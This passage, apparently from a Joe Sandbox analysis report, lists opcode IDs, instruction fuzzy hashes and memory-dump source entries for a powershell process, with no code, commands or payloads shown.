                                    • Opcode ID: 2eba01b75a9913a96a6fe88bca970cae44206c4f9153ad632837091c128e26b9
                                    • Instruction ID: b6595b715d8bd73e8e82e6ff44e9f1977ac246fab58e3a18a92e945e0c3d92aa
                                    • Opcode Fuzzy Hash: 2eba01b75a9913a96a6fe88bca970cae44206c4f9153ad632837091c128e26b9
                                    • Instruction Fuzzy Hash: 37F0A7F094820AEBEB249B60D4547BF3B73AB81215F149528C012EF2D1CF7D9841DB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c853a389ebe0fd935177ad9b9f9cba4f6074590e95473d3db7df988bcc543ab
                                    • Instruction ID: d3f3df46019eec1fa7c726be698662db512ef3405a07ef9ffde549f958f41ad9
                                    • Opcode Fuzzy Hash: 4c853a389ebe0fd935177ad9b9f9cba4f6074590e95473d3db7df988bcc543ab
                                    • Instruction Fuzzy Hash: C9E0EDB250420EFFDF01DEA08D019EF7BAAEB48240F008065FD0486111E2328A31AB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b9360abfb88da459349ec7338eeb916b8d840f97abe9ca389f9d327b146ef96a
                                    • Instruction ID: 5ce8ccd742f85f97a7e1fa662dc037ca4cedc1da060ef87bbbc54cf9fe2f9768
                                    • Opcode Fuzzy Hash: b9360abfb88da459349ec7338eeb916b8d840f97abe9ca389f9d327b146ef96a
                                    • Instruction Fuzzy Hash: 45E075B690510EFFDF01DFA08D009AB7FAAEB59240F118456FE1496121E6328A31AB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e3bca8f5a5814397b7bde00a66de70fc2d0d928fe421b44bcaebf56ecede0bab
                                    • Instruction ID: 0f15e6eaeac9b08ab0462791cfdecc3ba49781c3cd514afe85433d63438ef64a
                                    • Opcode Fuzzy Hash: e3bca8f5a5814397b7bde00a66de70fc2d0d928fe421b44bcaebf56ecede0bab
                                    • Instruction Fuzzy Hash: 9DE092B690110DFF9F01DEA08D00CAF7BBAEB48240B00C465BA0492120E6328A31ABA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6d2ab3b48853191f1e1473ef33f46ec58f02d5df1557b22e429c0f17faaa70ca
                                    • Instruction ID: 38ab05c5ee1c5b5946d1d277d21b221423d0f7f7fc91cbded4cfec303e2d6944
                                    • Opcode Fuzzy Hash: 6d2ab3b48853191f1e1473ef33f46ec58f02d5df1557b22e429c0f17faaa70ca
                                    • Instruction Fuzzy Hash: 2AF01575A01228CFDB68AB24E844B9DB7B2FF88215F0041E5D40997261EB305A90CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8fbe56149ab0e6ce9f824b1419a9bb610763de71e1b59e5d238b2f97de23d4e0
                                    • Instruction ID: 05cf86e1f2a4fc8648cdcda6b77dccc52512fbcfbc66a4b4c4307e227261c993
                                    • Opcode Fuzzy Hash: 8fbe56149ab0e6ce9f824b1419a9bb610763de71e1b59e5d238b2f97de23d4e0
                                    • Instruction Fuzzy Hash: A5D05E273596604BC70622A972242EE2B978FC912171980A7D40CD77A2DDA98C0B4BD3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f3cf44b250b37a7ab895b8b5bda95acb46a60823c1933587a327ef6605ee606
                                    • Instruction ID: 1f532937d2d3bfe03de3044a5ec470dad5fa3d9889e21b54eb057de061bf9ebd
                                    • Opcode Fuzzy Hash: 4f3cf44b250b37a7ab895b8b5bda95acb46a60823c1933587a327ef6605ee606
                                    • Instruction Fuzzy Hash: 0CE04F31900209CBDF14DFA4E5497EEB7B2EB94319F148028C416572D0CF7A2C45CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57b2bf6cb06cc99e51fedd951f57cb863fd9963e413079cf88258116ce20a60a
                                    • Instruction ID: 71412ef6b1be3edf663c3f57cba0f788ca7f6f55c4e094d8f9871d11020d02f4
                                    • Opcode Fuzzy Hash: 57b2bf6cb06cc99e51fedd951f57cb863fd9963e413079cf88258116ce20a60a
                                    • Instruction Fuzzy Hash: C0D0C93519A6849FC3428B64D4898487FB0DF172B432A81E2F5888F233C671C814CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6825629242a0962914f392a87619d2456a3b5768485008b43342f1e8d370d005
                                    • Instruction ID: d8ac19f025062e10ad1f84500f27e183500753562a22c86e3aca916185f8e1a2
                                    • Opcode Fuzzy Hash: 6825629242a0962914f392a87619d2456a3b5768485008b43342f1e8d370d005
                                    • Instruction Fuzzy Hash: F6C080F164B7D737E711565D5C11A237F5C5B73115F345165DC0588080FAD2D05042D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32388a28630170947c7a14079d37bd0230ce2c989af3b29a30980d36fc59ed27
                                    • Instruction ID: eab010b4dd877ceb25c65de8ee84f2d8ff62755526c79875b4f2b2aeff52578f
                                    • Opcode Fuzzy Hash: 32388a28630170947c7a14079d37bd0230ce2c989af3b29a30980d36fc59ed27
                                    • Instruction Fuzzy Hash: 40C02BB030138B330930956E2C029323F5C97730183244159EC04C4800FD42E08040E2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8724247588ab71e6ac2198e771bd5a9c2e7ca2ae7597bd90859689278546f0c7
                                    • Instruction ID: 39ae628558a95a1371a92408d0429bb654dd36d05817179b49066eb35448e304
                                    • Opcode Fuzzy Hash: 8724247588ab71e6ac2198e771bd5a9c2e7ca2ae7597bd90859689278546f0c7
                                    • Instruction Fuzzy Hash: D9C08CB1628500CFC3408B24DC5488077F0AF0A321F2140C0E00D4F232F332AC148B41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a60a30cd0454578af6b9b5d6dc121d8be7151fb41d88a687ff26278365b98ffd
                                    • Instruction ID: 679e301b1fb70a4fd3d1974d0b04c2e19374ed7e7590ad5e6960cf8ff1a5ed71
                                    • Opcode Fuzzy Hash: a60a30cd0454578af6b9b5d6dc121d8be7151fb41d88a687ff26278365b98ffd
                                    • Instruction Fuzzy Hash: 56C092382A41449FC740CB69E489FA9BBA4AF45B24F1541D8F10A8FA73C2A298008F00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79a93df405bc429466bd65229d29705813b12b6460fd06a522898cc08a59ba6a
                                    • Instruction ID: c16569c77793bc0f09bc920b9b274da3ad68a6c1fb003328aecad9df46874185
                                    • Opcode Fuzzy Hash: 79a93df405bc429466bd65229d29705813b12b6460fd06a522898cc08a59ba6a
                                    • Instruction Fuzzy Hash: E9B092342A02089FC2409B5AD849F01B7ACEF05A24F4140D0F2088F672C662E8008A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                    • Instruction ID: 48dd8479d5063d4be22e798b7a5bb2e74f213407087f6ef6f31ceb787385eb93
                                    • Opcode Fuzzy Hash: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                    • Instruction Fuzzy Hash: 82C0927A150208EFC740DF69E848C45BBB8EF19770711C0A1FA088B332C732E820DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a1b8e14955e49c4700df7916db9d3a7a673cbe0ead11e92b3af9a21c6a1bce2f
                                    • Instruction ID: 0c5157cd8f0d2ba1669ba5f49311fdc8b3f0597e8b6972b059e3008b57a185ae
                                    • Opcode Fuzzy Hash: a1b8e14955e49c4700df7916db9d3a7a673cbe0ead11e92b3af9a21c6a1bce2f
                                    • Instruction Fuzzy Hash: 80C0483A252001CF8BA09BA4E189941B3A4AB0862832189C6E9088B632D631A8208A00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                    • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                    • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                    • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0392715cfc2dd918e8a5a0e160578d04fe69fb45f100408f10a0f9feb8680578
                                    • Instruction ID: e614a509dac4f5b291b1da3c7c45fd3d6b5a7b6f08d9f9bcb1e64221a4c73138
                                    • Opcode Fuzzy Hash: 0392715cfc2dd918e8a5a0e160578d04fe69fb45f100408f10a0f9feb8680578
                                    • Instruction Fuzzy Hash: 42B0123060500CC7CA088F50E50607C7730DB42102F010184DC0E25050CA121C118B81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `oXk$`oXk$`oXk$`oXk$`oXk
                                    • API String ID: 0-1743996857
                                    • Opcode ID: a8dd3d9249268d27de46d54d6dee64a2ea4061a33d88b82e7e68ffcb1f0d8c56
                                    • Instruction ID: 8595d05e7d38cdd803b5d07caf8be5f302a3238d4311e414a25c8d678d3e344d
                                    • Opcode Fuzzy Hash: a8dd3d9249268d27de46d54d6dee64a2ea4061a33d88b82e7e68ffcb1f0d8c56
                                    • Instruction Fuzzy Hash: 09612C702157419FD714EB24C490B5973A3BFD5308F898E2CC14A8BAA8EB75FD85CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%